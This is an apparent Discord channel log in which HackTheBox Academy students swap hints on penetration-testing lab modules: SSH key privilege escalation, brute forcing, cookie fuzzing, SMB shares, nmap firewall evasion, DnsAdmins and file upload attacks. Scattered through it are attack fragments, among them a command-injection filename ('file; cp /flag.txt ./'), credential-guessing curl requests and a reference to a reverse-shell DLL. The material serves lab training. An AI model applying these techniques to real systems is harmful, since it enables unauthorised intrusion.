#modules

Hi, maybe can you help me? I have a question about cracking common hashes of module Cracking Password with Hashcat

If I'm doing the modules, should I write the important parts in a notebook or should I use the softwares provided in the learning module of the Academy?

Take detailed notes

@lofty kindle DM me 🙂

@west canopy ok, inbox

I agree with @livid pier. Everyone has their own thought process as they take notes. Id save links, tools mentioned and be sure to download the cheatsheet for each module. These can help you in the industry and on other parts of HackTheBox. At some point it may be challenging to keep everything in your head, so you can keep a document that you can easily search through to find tools you need for a given situation.

It can also be good to practice doing formal writeups, and attempting to explain what you did from the offensive and defensive side.

I keep a google doc for each module and try to screenshot each step of each problem

I use cherrytree and keep as many notes as possible for future reference.

hi guys im stuck at this question "Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'." in Getting started privilege escalation, i use the linpeas.sh, i get the ssh private key but i cant conect with it

i check the id_rsa with vim many times but i don get it what is wrong

if anyone can give me a hand please

@balmy creek Try SSHing as root instead of user1 , using the id_rsa key. The first time it will give an error. Then do a chmod 600 on the id_rsa key, and try to connect again

the same error and id_rsa is -rw-r--r-- 1 root root 2602 Mar 30 15:10 id_rsa

after chmod 600 it should be -rw------

I will say however the last time I tried this section I was not able to get it work , despite reproducing what was in my notes .

bro thank you so much hahaha i finally did it

i had tried with 600 but it gave me an error and I tried to imitate it with 644, which is how it came out in the linpeas

Anyone able to help with the Footprinting module, IMAP/POP

Hello

Hi please i haven't been active here

Can anyone help
I have been trying to install kali linux on my MacBook

But having issues virtual box

Always showing this
''Unsupported hardware
architecture detected!
The installer has detected an
unsupported architecture. VirtualBox
only runs on the amd64 architecture.''

And i have also tried VMware it's saying i can't install because my Mac is not running on Apple silicon.

I will be very happy if anyone can help me out on this i haven't try to install for so long

Thank you all and God bless you all

What my VMware is saying
''This version of VMware Fusion is
for intel-based Macs, but is
being run on an Apple silicon
based Mac via Rosetta-2.
A
See KB-84273.''

@here

that error is telling you that your mac is not x64 or x86, and so you need a version of virtualbox or vmware that is compatible with apple's processors

at least, that's my interpretation

I am having problems with the login brute forcing module , skill-assesment website section. I've been stuck on this module for some time.

Specifically because the password hydra gives me doesn't work

What is wrong with my second command?

can someone explain the difference between kerberos and LDAP? they both seem similar since they are used to authenticate for AD

@urban valley Kerberos is more or less "single sign on" for AD environments

@raven cairn DM me 🙂

@west canopy I will. I have to do some college stuff and then I will dm you.

somebody plz help lol

how is this wrong

I realize that's not the flag but I feel I did exactly as the instructions stated and that's the only response I got

@unreal sigil Assuming you went through all the steps in the section, you will need to delete HTB_City and HTB_New_City

Then after renaming a city to "flag" you should be able to curl it and find the answer

Okay I added that now too, still no flag 😭

oh , new city

got the flag lol ty

hey, has anyone done object machine?

i need help

@trim solar This channel is for HTB Academy modules . Is "object" a live box?

no. it is retired machine.

Ah gotcha. Not sure if there is a Discord channel for retired content. You could probably find a write up online somewhere though 🙂

ohk thanks

several things that I see wrong

dm me and I will help you

Hi guys

is this the right channel for questions about tier 0 machines?

@rustic sage I think that's going to be the "starting-point" room

Hi everyone, I am doing the final skills assessment of web services & api Attacks, someone who could give me a hint or what should be used to find the flag i'm traying with sqlmap but i'm not sure how perform there isn't hints ...😅🤔

Thanks for the help! @livid pier @west canopy @unique valve @lethal atlas I learned to use both Flameshot and Cherrytree and downloaded the cheatsheets for the modules I've done, and I'll follow this for other modules too.

hi guys!!!

just wanted to know if it is a mandatory to use pwnbox to make labs? because i cant ping the "target"

i used the vpn file, and since there is a VPN file i must be able to contact the "target" and use smbclient to list the share (im doing the windows module)

and now target is down 😢 so maybe it was that, i retry

....

and again the target disconnect...

i remember why i stopped using academy

cant even make a shared folder without the rdp session disconnect and cant reconnect

30min and cant even make this simple stuff due to connection reset every 2min... i pay stuff for nothing...

this is a VPN issue... i must stop and restart the VPN to make it work...

and even when target is up we cant connect to list SMB with the command provided xD

even with smbclient -L \\\\IPofTarget -U htb-student

So, I'm doing Linux Fundamentals, and module Working with Web Services. Question one is to find a way to start a simple HTTP server, and there is examples. Only thing wrong is, whenever I try to start one, I get permission denied. When I use sudo apt install apache2 I get a password prompt, but was never given one earlier?

Consider the firewall on the Windows target. The section reading mentions this. Part of the exercise is considering what might block connections over smb.

not at all

i know about the ping issue, but we must list the smb share without making anything else than smbclient

Try disabling the firewall on the windows target.

with being disconnected every 2 min from the target it will be hard to do that on every lab where we must make "external" connection

You wont have to do it on every lab but it’s important to consider the firewall always because in the real world its a factor whether you are an IT admin or pentester.

nothing changed

Feel free to dm me.

ty but i know that and i was sure it wasnt the problem like we can see

dm for what??

the lab doesnt work

and im disconnected every 2min...

So we dont spam the channel. The lab does work as others have completed it.

lol nope it doesnt mean it worked for others

i was able to answer all the questions

you dont need to have it work for that

Is htb-student in the permissions list of the shared folder?

yeah

read for everyone

like it is the default

that's the default lab, if i needed other things to be changed why it isnt mentionned 😉

hello world

Testing now.

tried with smbmap and said port 445 not open...

thanks

the connectivity is a nightmare, i must CTRL+C every 2min to be able to reconnect via RDP to the target so it doesnt help too

Its working on my end.

so why it doesnt work on my end?

like the connectivity

i reset 3 times the target, the pwnbox...

you just created the folder and share it like in the "tutorial"??

Yep

Then either disable the firewall or enable rules that allow smb

In Windows their are 3 firewall profiles that can be applied. Domain, Private and Public. Each considers what network connections originate from.

already did

i first disabled it like you can see in the screenshots

after that i created a rule for smb to allow all inbound/outbound

i gave up

with the disconnect every 2min it is a nightmare to troubleshoot too

You sure you tried disabling all 3 firewall profiles?

thanks for your time 🙂

yeah im sure 😉

but even with all of that, it is normally isnt needed, it works for you by following the tutorial and nothing must be changed

i reset the target 3times and did extra steps but didnt worked and like i said it takes me 10min to just make a simple firewall rule with this connectivity problem (and i have only problem with academy)

im just the type of guy who want to do it because i wanted to follow it but i already did some boxes with smb pentesting

anyway, thanks a tons for helping

DM me if you would like to troubleshoot further. My RDP session is staying connected as well so it may be worth looking into a few other details.

now my keyboard doesnt work on the RDP session xD

i will stop htb for some days lol thanks

i tried a last time and now i have a stable connection (idk why...) and it works without any change @unique valve

hey guys, i was doing the 'using web proxies' module and i dont understand what this question is asking of me

from the zap fuzzer section

the hint told me to ||fuzz the cookie with md5 hashes with usernames in a wordlist||... i think i did but idk what im supposed to look at

you must fuzz the cookie you found previously with the top-usernames-shortlist.txt but dont forget to md5 every username

lol i just saw the hint is what i said xD

im so confused right now

no idea what i did wrong

One more Note: Kerberos is exclusive for Authentication, where LDAP was designed as Directory Service (who remembers NIS), so Information Data (groups, users,...) are centralised stored.

and kerberos used ticket and it is used to not pass any sensitive info on the network

and ldap is a way to communicate with AD when kerberos is "only" an auth service

LDAP and AD is like apache and http where LDAP=http and apache=AD

if i can make the parallel

it is the entire wordlist in your screenshots?

yea

the worlist only had 16 usernames

and you fuzz the cookie previously found?

yessir

so idk what you did wrong ^^

lmao

wait some people who has access to it because i dont lmao

did you visit the /skills/ before fuzzing??

maybe it isnt the previously cookie you must fuzz but a new one

GL 😉

(Subnetting): so if I want to create 8 subnets, = 2^3, should I change 26 to 29?

Also, I'm using IP Calc to help me on this, I hope it's not considered cheating, I wouldn't know how to do that with pencil and paper

OMG I think I figured this out I can't believe it

I felt the same way when I first tried subnetting. It can be very daunting until you catch that one key thing then it all makes sense.

I read somewhere that you could create tons of subnets in your home network to protect yourself from attacks

because it'll take a lot of time to scan every single one of them

it would also create latency on the network

if you decode the cookie found with md5 you will see, as the question says that it is "guest". What you need to do is load the entire wordlist, then encrypt each word in md5 before fuzzing. Burp payload processing allows you to do that. I cant remember how to do it in zap.

feel free to dm me

Quick question guys, I'm doing manual credential enumeration and everytime i enter the command to post I'm getting a bash error that no such file or directory. But that's how they showed it in the examples, any idea what I'm doing wrong?

curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" <IP>/xmlrpc.php

Has anyone done the bug bounty methodology module? I'm either not understanding the question, or the question answer is wrong edit: i did not understand what it was asking

Module: File Inclusions

Section: Automated Scanning

Can anyone help me with this one

Its cleared... Thanks

Can anybody tell me what I'm doing wrong? I'm doing it just like the module (hacking wordpress) says to do it.

just read the section and apply those same wordlists

it will work

first u need to find a valid param

Hey guys. I need help at password attacks module. Can anyone help me?

I tried the same word lists.. Gone through the section in detail.

dm

Can anybody help with hacking wordpress?

yes sir

Hi! Unsure if this is the right place to ask, but recently i reedemed a htb academy gift card and currently have some money in my account balance. Is it possible to redeem that into a subscription purchase? Whenever I try to buy a subscription it prompts me to pay again

DM?

@lethal atlas

sure.

better question for the staff.

Ah definitely, should I contact a staff member directly?

I would not. They tend to frown on that.

You might just tag them with "@red obsidian"

Can anyone help me at fuzzing module?

Fffuf on web application

yes I can

Contact support via the green chat bubble while logged in.

Great, thank you :)

maybe ip=url?

no, it needs an IP address

or maybe its local

default-passwords.csv?

i meant the IP address

i'm understand. it's new questions!

what are you working on now?

Weak Bruteforce Protections

change 10.. 127... 192... in basic_bruteforce.py

Anyone here good with python?

Sorry, no.

me either bro

You may want to check the community help channel.

Well anyway, I got invited to do some google coding problems, I have finished the first couple levels and they asked me to refer a friend, if anyone wants to try them

A little, what's it about?

dm me

I am hoping if i can finish them it will lead to an interview 🤣

I need a job so bad 😂

lol

You're trying to get a job at google?

please see:

😛

I found some binary code on a website and translated it, turned out to be an invite

nice!

I didnt orignally plan on doing this, seemed like it could be a cool oppurtunity tho

GL brother, I really hope you land it, I hear its a great company to work for.

Lol ya I dont even know if it will turn out to be anything

Thank you tho

Your only limited by how much you want something, if you want it, you will take those measures to achieve it. If you want to work at google, you will work there.

Lol thanks, its not the most useful change log

Hi, has anyone connected finished the final assessment for the File Upload Attack module. I think I'm near the end but I can't read the file. MP please.
EDIT: Got The Flag, thanks to @west canopy 🙂

@alpine summit I got you dawg 🙂

Where i can get the root password for the htb vms? Or do I need the root privileged for nmap?

@scarlet mirage check the desktop for a my_credentials.txt

thx

hi everyone! I'm in HTB Academy on Getting Started module in service scanning. When i try to do an smbclient using 'bob' username with the password mentioned along this page it give me a logon failure

i try manually writing the password and copy and pasting the pass and i cant acces

any hint? Please

@glossy oxide in your URL make sure it includes: index.php?language=languages/

after that try and use some of the techniques shown to read the flag

What's the command you're using?

smbclient -U bob \\<port>\users

then it ask me for the password but i cant login due a logon failure

is not <port> is the <ip> target the i enter the pass but i cant login

then i*

I will dm you

okay!

Hey everyone Im learning linux fundamentals but I am having trouble finding the shell.

Where you at? wht section?

found it

In all seriousness

echo $SHELL

Thanks!
I was including it, but I was combining techniques wrong. Then I started trying more complex (and useless) things, as always.

Anyone able to help with the Easy Lab on footprinting?

Can anyone help me figure out why this isn't working

try HTB{<flag>}

HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre}

^^^ That is how a flag should look

mostly...

Which module and section is this?

HTB Academy > Cracking Into HTB > Java Deobfuscation

do u copy and paste the flag or text it manually?

copy/paste

@stark atlas DM me if you need a nudge on footprinting easy lab 🙂

Just jumped off although I will likely message you tomorrow if a break from it doesn't help - thank you!!!

Wrong flag altogether.

You might have found a flag from an upcoming section.

wow, yeah lol looks like you're right

got it now, ty

i'm also having trouble with this section. I got the S** user but i can't find anything else

A bit oot, but still relevant, i have question regarding cube, i believe i finish around 5 modules and 2 in progress but why my cube only left 20 ? While 2 in progress is only 10 cubes each

@faint locust It might have to do with the cost/refund ratio of the modules you did. I think "fundamental" modules cost 10 but refund 10. But a 50 cube module also refunds 10 I believe. My math could be wrong though

So if we use for 50 cube, we will lost 40 cubes if the return is 10?

I think so . Cube return is 1 out of 5

so 100 cube module gives 20, 500 cubes gives 100, etc

Okay thanks

I was stuck on Windows Privilege Escalation > DnsAdmins. I have found a solution differently but want to know how the section intended it to be done. I was able to get the netadm account to show up as Domain Admin (when running 'net group "Domain Admins" /dom'), but am unsure how to grab the flag after this point. Any help is appreciated, thanks in advance!

@severe birch I had to use a reverse shell DLL file in order to get the flag

That is what I did as well

But i think you might be able to right click on CMD, run as administrator, and then select the recently added Admin user

Like i think it needs an elevated CMD shell

hi! Need some help with command injection skill assessment, i think i already have the enter point but no clue how continue

Hi someone already finished the web service & api attacks module? There is no hints and i'm stuck any hint would be a great help! 🙌

Where are you stuck ?

hi guys, I'm stucking in a htb-academy beginner module (Windows OS Fundamentals)

with a Linux VM (from htb) I establish an RDP connection to a Windows OS. There is a shared folder there. The Windows firewall is off. I should create a mount point on this Windows shared folder with Linux. This worked. Now I should display a list of the shared data with the command net share. But here I get an error message...

Can anyone help?

Normally, this should come out.

Solved:
ok i was blind. This command is to be executed on Windows. *slap

.

Ok, then I have another question based on that. Next in the module it says:

"We have not shared C: manually. The most important drive containing the most important files on a Windows system is shared via SMB during installation. This means that anyone with the appropriate access can remotely access the entire C: drive of any Windows system on a network."

But when I look at the property of C:\, it is not a shared.

How is that possible?

Its a default setting in Windows operating systems. For some reason its not reflected in the properties you are looking at but its shared as seen from the net share command output. Theres a service called Remote Registry that when started, with the right local admin credentials allows remote connections to C: over the network. Can make administrative work easier but also create quite a security issue.

So C:\ is a hidden share, but is shown as "Not shared" as shown in the picture above. Confusing 😄

Agreed. That is interesting.

If I create my own hidden share on the same host, it is not visible to the others, as desired. However, under Properties it says "Shared", unlike C:.

ok i understand

thanks for the answer 🙂

No problem. Hidden shares cant be as easily discovered remotely. Its an effort by Microsoft to try to make sure connections to shares come from people who know the exact name of the share. But all one must do to connect to one is know the share name followed by $

Okay, I understand

Only the host can see the shared folders simply by using net share or Computer Management. Remote users cannot do this, they need to know the exact name. All right.

With hidden shares yes, but like most things in Windows theres probably a way to get around this remotely. Would be worth doing some research on.

Thanks 👍

@west canopy did you use xsstrike to find the payload that would work or did you use the other two resources given in the previous section? My login form shows up but the document.write is showing and the image url form is still showing with my ;document.get.elementbyId showing after my login form.

Hello, for module "Attacking Web Applications with Ffuf", in the last section, i need to put all extensions in alphabetical order, but doesn't work...Anyone can help me ? Thanks 🙂

hey all, just in case you haven't noticedd we introduced global search functionality on Academy. if you search you will be shown both modules and sections that contain your search term. should be useful for anyone working thorugh the content, exams, using Academy as reference on a pentest, etc

dm me and I will help

Any chance you had a similar situation for the ServerOperators section?

@broken warren I tested each one the examples provided in the section manually

@severe birch Not sure. I don't have anything in my notes about it

Hi, I'm stuck on nmap enum Firewall & ids/ips Hard lab.

Objective: submit version of service client was talking

Hint:they were forced to add vital service for customers as they require large amounts of data

But when I type the answer it's not correct...

If you need help DM me

I did: nmap -sV -sC ip address found port 22 and 80

Then nc -nv ip address

Found the answer but not accepted

That will not get you the flag for the hard lab

What trusted port did you discover in the previous lab?

There is a trusted port that will allow you to get packets through that you should have discovered earlier.

Don't even remember 😅

You got the easy and medium labs done, correct?

Yes

I cannot attach pics :/

ok so you don't remember what source port you got? Do you remember all the ports you discovered? p22, and 80 are not involved in the hard lab

Will have to re-do the medium then --'

redo some of the steps and use notepad to keep some notes on your process and discoveries, hit me back when you've gotten the trusted port that will allow you to pass TCP/IP packets.

@open spruce try doing -p- for all ports, there might be a "hidden" port for you to find

@west canopy already done

try 'namp -sS -sC -sV -p-'

@maiden slate You requested a scan type which requires priviles. Quitting

I tried with sudo vut ofc it asks for the password

it is on the desktop

credientials file

God I did not realized 🤣

No one does, hidden in plain sight

How does the Windows OS academy module expect me to smbclient into the target machine if it's on a different network...?

@open spruce Figure it out?

Same result and @maiden slate I found the screenshot of my answers from medium lab

My teminal jobs

you used the sudo su command and input creds and you still got an error?

No error but it displays the same only 22 and 80

Alright try 'nmap -sS -sU -V <IP> --disable-arp-ping ( I can't remember the trace command)

Mabye not the -sS, can't remember if you can do that and -sU together or not.

anyone please give me a nudge in information gathering module

I did sudo nmap -sS -sV -sC -sU ip --disable-arp-ping

Platform x86_x64Linux
Available nsock epoll poll select

@torpid ermine Fully Qualified Domain Name

yep

@open spruce So did you remember what trusted port you used? It should be in your lesson.

Just to reiterate my question from earlier, I am trying to do Windows Privilege Escalation > Server Operators and I have been able to have the user show up under "net localgroup Administrators", but I am unsure of how to retrieve the flag.txt with these new privileges. Any help would be great.

i need to get that fqdn for that domain

inlanefreight.htb

@maiden slate I don't remember but I have the screenshot with the nmap I did to find the answer for the medium if you want I can send it privately

Go ahead

you need to use nslookup

yes i tried

your command is missing ne thing

also tried adding vhost

can someone give me a nudge on broken authentication > session attacks > Bruteforcing cookies > question 2? I am struggling to find what it is encoded with

Send me the cookie

Yoooo whats up everyone. I'm working on Bike, and can't get past displaying one [object] in the output of my Repeater. Checked all the code but no joy. I know the output i'm shooting for is "root". I did do the walkthrough but I'm thinking maybe something is awry with either foxyproxy or burpsuit

copy from PDF it's broken, be careful of indent and line break 😉

much love thank you

I think im on the right path now. I was missing something small and stupid as usual

Story of my life

literally just needed to install cookie manager to see the persistant. Burp wasnt catching it.

If I am able to get my currently logged user into the localgroup domain admin or administrator, how can I use to view directories like the /Administrator directory? I keep getting access denied and I am assuming I am missing a step or something

I just completed it 100% as well 🎉
(Btw, someone know why i can't share screenshot in the channel ?🧐 )

Congrats!

and no

mine works

did you register your account?

good question 🤣

Talk to @little whale

Finally 🎉 🍺

Ho, thanks ! it work 😁

Thanks to you, I got it!

Nice!

Congratulations!
When are you going to the exam?

I still need some time

Thanks !
I don't know, i have some question about this one again. I will do when I find answers^^

It happens faster than you think 😉

Yes, still two modules

Could someone please help me. I'm stuck on the network services challenge of the password attacks module on hack the box academy. All of the challenges start with the phrase "find the user" but I have no idea how it expects you to find the user. I've tried running nmap scripts and banner grabs but provides no actionable information. Right now I'm brute forcing the WinRM service with nmap nselib password and username lists but it's not getting me anywhere. Is it another one of those stupid ones where you have to nc connect to a random port and sit there for 30 seconds?

I would add a picture but it won't let me

No images in academy, just for me ?

Try navigating to the section using the sidebar

Hi there, I am looking for some assistance in [Attacking Web Application with Ffuf] Module, Parameter Fuzzing - GET section. I have the answer already just by guessing (lucky in that regard) but what I can figure out is how I would actually get the answer. Appreciate any guidance: The question asks Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?" What page? I have tried the base (index.php included or not) and the various subdomains and directories with no success on the parameter fuzzing.

@kindred prism you want to fuzz against /admin/admin.php?FUZZ=key

Have left this going for 5 minutes, refreshed, now its been 10 more, anyone know how I can fix this?

Took me 20 mins but it did spawn

Really frustrating

Yikes, guess its time to call it a night lol.

which module

Footprinting

ahh I'm getting weird responses with ffuf module on spawning

There is no flag here. Get back to hacking!

@rustic sageYes! Thank you!

.

Need help for module "Login brute forcing", section "skills assessment - service login".
Can you confirm the website we need is on the same target IP ?

Hi! I've a question about the module Information Gathering and the host gear.githubapp.com. I have to find the servername but when I submit it it's not accepted. Am I wrong, or has it changed?

Got struck

How to find capture the flag

Spawn the target and use cURL to send an HTTP request to http://<ip>/download.php

This answer is refused, can someone confirmed it's normal? I was pretty sure about it.

Tried removing the dot at the end?

I tried without the dot, but it's not accepted neither. Do you agree it should be this (with or without the dot)?

I've not done the module, friend, I can't help, sorry

Ok, thank you anyway. There is no hints so I guess it should be simple.

I've not found any of the academy stuff easy, even the easy things are somehow made hard.

I've done several modules and I found some of them easy, usually with the courses it's doable. If you need help with a module I've done, I can help.

Which module are you talking about?

I'm talking about Informations Gathering.

Nope. Different module

this one, I haven't taken yet

Still no luck in Brute Forcing module, Skill Assessment last two questions. Anybody here already did that module and could help ?

@glacial blaze DM me.

Thank you @main vapor !

I'm in need of help. I've been trying to solve Network Enum w/ Nmap: Final section (Hard Lab) for weeks. I've (finally) discovered a new port 50,000. It's an IBM DB2 service.

running db2-das-info.nse returns me nothing. Tried both the custom "50,000" port. Tried the default (523) port. Changed my source port around. Tried all types of scan-types.

I don't know what else to do. I recieved bad information from someone last week, led to believe (foolishly) that I was supposed to enum DNS... and only today have found this "hidden service". I'm still unable to enumerate a service-version.

any help or hints at all. I am very fresh to this. I've been here only a month and this one is really causing me a lot of pain. I feel like I've exhausted all of the research that I could

Couldn't enumerate the DNS, either *(I don't know if that's the correct service, or the db2)... either way, I am stumped and can't crack either one.

I'm not sure where I'm going anymore. I feel like this is a bit too advanced for any newcomers.

@1emur Keep it simple. You just want to find a way to get this port in an opened state.

anyone please give me a nudge in information gathering module

@torpid ermine I did it on yesterday, do you want we DM? When you'll be in a next section I will ask your help too 😅 .

I don't know, man... I've tried minimal and maximum handles. Scripts. No-scripts. Sourceport. No-Sourceport.. i'm throwing my hands up. This thing is breaking me down.

sure thank you

tried removing --disable-arp ("well, maybe it needs to resolve something").

dns resolution... no dns resolution... with ICMP, w/o ICMP (obviously, the IDS prevents that one, but I thought "crazy, but at least try it")..

with and without changing my source-port.. I don't know what else is wrong. I've been trying everything

You are overthinking this and may have not tried something simple learned in the module

I've even stripped it down to just "--script" and nothing else

tried no script at all. I'm down to just "-sV" (and of course -Pn)

Some help about -->STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86-->Page 5 Identifying Bad Characters
When im creating the new array, i get this:
Invalid value: "Bytearray"!
Unknown command/expression: "--Bytearray"

Anybody else not using browser based pwnbox and having problems reaching targets from VPN ?

sometimes

Okay I answer my question in case someone else has the same thing. For the ERC command to work, a program must first be open

Just reset the target

Sometimes i need to reset it several times

hey guys, I have problems with an answer in INTRODUCTION TO ACTIVE DIRECTORY

basically this is the question: What role ensures that objects in a domain are not assigned the same SID? (full name)

the answer seems pretty easy, but no matter how I write it, it is wrong

Full name, no acronym for that one

Is anyone else having issues spawning targets for the modules? Trying to do Footprinting module but last night and today the machine just keeps saying "Target is spawning..."

i do on occasion and often my scans are unacceptably slow, to the point where it goes beyond the time-limit. i don't understand it.

other days, it's fine

I have been doing these for maybe 2-3 weeks without issues, but last night and today it is far too slow to accomplish anything.

In the Session Security module, the Cross-Site Request Forgery (GET-based) section - I had to change method from GET to POST in the attached html code, to get the result. Anyone else had it? Surely it was supposed to work with get method as per section title.

I think that it has something to do with the weekend. Most people have a full time job and have only time for learning on the weekend. Therefore, the servers are working quite hard, which leads to delay.

In the Web Attacks module - Bypassing Security Filters, the text of exercise says "To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./". It's not clear if I should use directly as input "file; cp /flag.txt ./" (that the browser already encodes as "file%3B+cp+%2Fflag.txt+.%2F" or I should also try to encode ; and / in different ways. Because for both strings I tried all the HTTP methods (https://github.com/danielmiessler/SecLists/blob/7a42879a4687429778fea78067d075d4616ba83f/Fuzzing/http-request-methods.txt) with no results

DM me if you need help with it

Without giving too much info - this question is way easier to do using burp than manually. Different methods may require some additional fields https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods
And I spent way too much time on that one trying to do it by hand.

Hey, quick question, can someone ping me the wordlist to use for the 3rd question in the skills assessment in the Attacking web apps with Ffuf (find the 'you don't have access page')? I understand the process but my scans are taking over 90mins to complete and the server is only up for 90mins so I have to re-start the scan so it's a catch-22. It's frustrating to put it nicely.

it's one from cheat sheet

Thanks. But I think I've tried that one...

I can confirm that 'page_file_name' is in the wordlist, without extension. Hint is actually a good one.

in the 'small' file?

Yes

OK, one last scanning before I move on.

Hello, I wanted to know if I subscribe to a plan. Can I stop it at any time or is there a commitment period?

could i trouble some one for a nudge pls Cracking Common Hashes question been stuck for months keep coming back to it but can't see wood for trees somewhere
the hash
7106812752615cdfe427e01b98cd4083

@rocky sedge DM me brother 🙂

thank you friend much appreciated

Hello, can someone help me to better understand something in :
module : network enumeration with nmap
section : Firewall and IDS/IPS evasion - Easy Lab

@upper niche I can certainly try, what's up?

@west canopyi don't want to spoil anyone can i dm you ?

of course 🙂

Does somebody know why the right answer is not the version number of the dns server as the question states?
module: network enumeration with nmap
section: Firewall and IDS/IPS evasion - Medium Lab

@muted rampart its actually in the format of a flag i.e. HTB{something}

https://lmgtfy.com?q=test

could someone help me with 'Shells & Payloads' - 'The Live Engagement'. I'm on Host-1 found many ports and services open with nmap, but no ms exploit that works. Also the creds ' tomcat | Tomcatadm ' do not work for the manager access, not sure where those came from...

nvm, it was a webshell exploit

I am supposed to be finding a network request to a flag... I have clicked through every single request but I can't find any request to a flag. Can someone help me understand?

@tight mesa try refreshing the page, eventually you should see something like this

okay, thank you. I've refreshed the page 5 times so far, and that has yet to show up but I will keep at it

I've heard from other people that they had trouble getting the flag to show up, but personally i never ran into this problem. I guess if it doesn't load maybe try respawning the target.

hey guys does anyone solve File Inclusion LFI and File Uploads ?

when i go to setting.php and press upload it gives me file not allowed error

I don't know if you tried the search function with 'flag' but that helped me 🙂

Have you tried clicking on profile first? (Above the 'upload' button, where the profile picture should be. It should open the file selection window) Then pick a file and click upload

lol.thank you brother.what an idiot i am😂

Haha, dw i got tricked too 🤣

Any one please answer this

@rustic sage it's not working

nice

what commands you tried ?

module : WEB APPLICATIONS
chapter : Common Web Vulnerabilities
I have read and tried several words that according to me could be categories of public vunerability but I did not find, is that somebody could define me what he understands by category or give me the answer?

Thx ☺️

@rustic sage DM me 🙂

thanks for your share mate

No, you do not need to modify any config files.
Try a zone transfer on the found subdomains.

I think you do need to have inlanefreight.htb in your /etc/hosts though.

Curl http://x.x.x.x/download.php

if it returns you nothing try to store the curl in a txt maybe

Yes it return me nothing

I tried everything

acadamey > cracking into htb > java deobfuscation > http requests

it's saying the flag in the response is not the answer and that the answer should start with an n and end with a z

I have no idea what that means, I don't see anything like that from the response

Hello guys. I have trouble solving the module HACKING WORDPRESS on the section **Directory Indexing ** for some reason i cant find the correct directions

can anyone help me?

nvm got it lol

Look at all the subdirectories.

what do you mean

There are many directories. Some are "misconfigured" and you can list the contents.

how can i find them

i have done that

what should i do ?

open each directory and look at the contents

these are all directrorys

should i search php as well?

No, only directories and subdirectories

ok

also do i need to search it through shell or i can search it on firefox

You can use both, whichever you prefer.

i got nothing

I'm doing the starter module and the question is "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file."

I think i already found the right exploit(auxiliary/scanner/http/wp_simple_backup_file_read

) but this exploit requires the filepath. I set the filepath to /flag.txt and metasploit gives me this:

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Did it work? When yes where is the content? am i even using the right exploit?

i tried to change the depth to 0 to 1 and to default 6, but im getting the same result

Starter Question:
I am working on Pentesting Basics > Basic Tools.
The module is asking for the header with an IP address. I am trying to use Netcat to do it.
However, I cannot install Netcat without the Sudo password on the pwnbox (through HTB). Is it already installed and is there a way to check?
Any help on how to proceed with this is greatly appreciated. Thank you in advance!

@elder pendant You should have access to netcat... 🤔 What happens when you run "nc -h"? Maybe try resetting the box

anyone finished with the file upload attacks module?

kind of stuck on the whitelist chapter

how many times are you gonna sanity check me ? xD Thanks again buddy

not sure what i'm doing wrong

acadamey > cracking into htb > java deobfuscation > skills assessment

The data sent to the server with POST is stored in the request body of the HTTP request
https://www.w3schools.com/tags/ref_httpmethods.asp

I visited the link but still don't understand what I'm doing wrog

wrong

In your screenshot, you sent the data in the URL like a GET request. The task is asking for a POST request

curl -s http://134.209.186.158:30572/ -X POST -d "key=API_p3n_73571n6_15_fun"

would that be more accurate?

Yes.

I didn't receive a flag with it tho 😭

@unreal sigil Let me try it out, please...

u forgot the -d before data no ?

yeah i had tried that too but same result

not on index page

it's literally the very last question of the whole module . i don't know how i got this far just to get stuck here lol

wym

if i remember correctly...

You need to send the request to keys.php

ugh i swear i tried that but must have had something wrong. ok i'll try it thx

oh

nvm lol

😉

not serial

lol

geese, finally got it lol
thanks for all the help

I don't agree with what the flag says

I'm obvi not ready lol

Does your pwnbox have access to the internet at all? I thought it was only for VIP users

@lament crag ping paypal.com

strange

try

echo $TARGET

Never used pwnbox...

But I can try now :)

Same issue here... ://

Or whois.exe in Windows. Whatever you need

For tasks I need to connect to HTB's VPN I use a VM and if not I do it from my host OS (Linux)

Nope. Fedora VM on Fedora host :)

@lament crag Yep.

I prefer not to connect in my host OS to a network where people learn how to hack :)

Yep, but at some point, you'll need to use a VM.
And for this task, you do not need to connect to a VPN, and PayPal has an official bug bounty program with paypal.com in the scope, I don't see a reason for concern

good, where can I make a query about a subject of the FFUF module?

Working on this question currently and wondering if you ever got the answer to this and was wondering if you had to make a complex query to figure it out

Not all directories show you the content. You have to search

Here.

Hi! can someone please give me a hand with this, I am doing NETWORK ENUMERATION WITH NMAP, and on the Service Enumeration question I think i got it but the system keep saying is wrong... but i am pretty sure that is a flag... any ideas ?

the question is: Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.

Not the right flag...

Anyone done: Getting Started - Public Exploits ? | Should there be a VM in there?

Got it

The connection to the target MySQL usually fails a lot
#mysql -u root -ppassword -h 134.209.28.38 -P 30750
#ERROR 2002 (HY000): Can't connect to MySQL server on '134.209.28.38' (115)
Anyone knows why?🤨

Amy working in Module Hacking Web aplication with FFUF

I have a problem with VHOST Fuzzing

come for anweres to questions instead you will get children decsribing the water your drawning in. yeh I'm to old for this.

not the help he needs, you should try harder. Hear how stupid that motto is !!!

I have completed that module. Hit me up and I will help

Anyone finished the broken auth module? could use a hint with the final assessment.

Im working on skills as well

anyone got any hints for windows priv esc skills assessment 2?

trying to find left over credentials for iamtheadministrator

i can see the files its in but access denied for most, not sure if i have to escalate before

oh found it

nvm

i need some help with information gathering at Active Subdomain Enumeration. pls dm

@acoustic owl can I dm you for help?

sure

tried asking in general chat but only got trolling responses lol

which os would you recommend I run on my vm

windows or linux

and which version

installing vmware rn and it's asking me what I want to run

I was thinking linux but then do I choose ubuntu, fedora, oracle, debian, etc.

on VMBox u can install both. I'm using Parrot Debian based distro and i feel its good

Hi, i need some help with the broken authentication skill assessment module

Anyone able to help with Footprinting Lab - Easy? - Sorted now

Hello, everyone. I am having trouble with the Web Request Module.

More specifically, the Get Method of Curl.

@weary forum what part are you stuck on?

https://youtu.be/TM-GY01dWpo

Hello, anyone finished the SQLMAP Essentials?

@soft jolt what section did you need help on?

